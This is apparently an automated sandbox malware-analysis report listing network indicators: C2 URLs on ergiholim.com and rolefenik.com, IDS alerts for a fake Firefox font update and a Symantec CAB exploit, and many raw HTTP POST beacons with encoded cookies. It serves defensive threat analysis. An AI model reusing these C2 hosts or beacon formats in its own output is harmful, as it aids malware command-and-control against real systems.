            Source: Malware configuration extractorURLs: https://ergiholim.com/test/
            Source: global trafficTCP traffic: 192.168.2.6:49710 -> 45.143.166.230:9043
            Source: global trafficTCP traffic: 192.168.2.6:49982 -> 87.120.37.120:9043
            Source: Joe Sandbox ViewASN Name: NETERRA-ASBG NETERRA-ASBG
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: ITTITT-ASRU ITTITT-ASRU
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49988 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49994 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49990 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49998 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50003 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49995 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50007 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49999 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50012 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50010 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49991 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50017 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50015 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50022 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50016 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50005 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50018 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50019 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50011 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50027 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49997 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50024 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50028 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50013 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50026 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50034 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50023 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50033 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50038 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50039 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50032 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50041 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50040 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50042 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50049 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50021 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50053 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50035 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50001 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50044 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50050 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49996 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50051 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50046 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50057 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50065 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50047 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50059 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50070 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50066 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50071 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50048 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50055 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50004 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50067 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50061 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50054 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50075 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50074 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50063 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50062 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50072 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50080 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50077 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50058 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50069 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50082 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50037 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50068 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50087 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50091 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50092 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50056 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50085 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50088 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50094 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50083 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50079 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50090 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50096 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50078 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50086 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50089 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50064 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50084 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50093 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50006 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50076 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50095 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50025 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50030 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50081 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50045 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50036 -> 104.21.92.105:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50043 -> 104.21.15.162:443
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49754
            Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.6:49956
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
